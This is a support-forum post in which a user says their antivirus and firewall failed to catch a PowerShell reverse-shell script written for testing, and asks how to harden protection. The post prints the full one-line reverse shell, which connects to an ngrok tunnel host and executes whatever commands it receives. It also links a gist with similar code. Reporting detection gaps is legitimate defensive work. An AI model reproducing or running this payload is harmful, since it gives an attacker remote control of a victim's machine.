Jump to content

Antivirus did not detect a reverse shell trojan PowerShell script.


0xp1p3
 Share

Recommended Posts

Hello,

I went to test the antivirus by creating several malicious payloads and it detected them all, but it did not detect a malicious payload of reverse shell in PowerShell. The firewall didn't stop the reverse shell either.

Antivirus detected other reverse shell scripts in powershell, but not this one.

$client = New-Object System.Net.Sockets.TCPClient('0.tcp.sa.ngrok.io',11248);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Also tested reverse shell on port 1234.

GitHub link: https://gist.github.com/egre55/c058744a4240af6515eb32b2d33fbed3

image.png.254e67850addf2c4497a865b070302f5.png

image.png.833307bd8a604c4bd0259cbbbfaa0dab.png

  image.png.95c6161812454f825de54b2e74748543.png

 

What should I do to further improve antivirus protection in this case?

Edited by 0xp1p3
Link to comment
Share on other sites

Please sign in to comment

You will be able to leave a comment after signing in



Sign In Now
 Share



×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.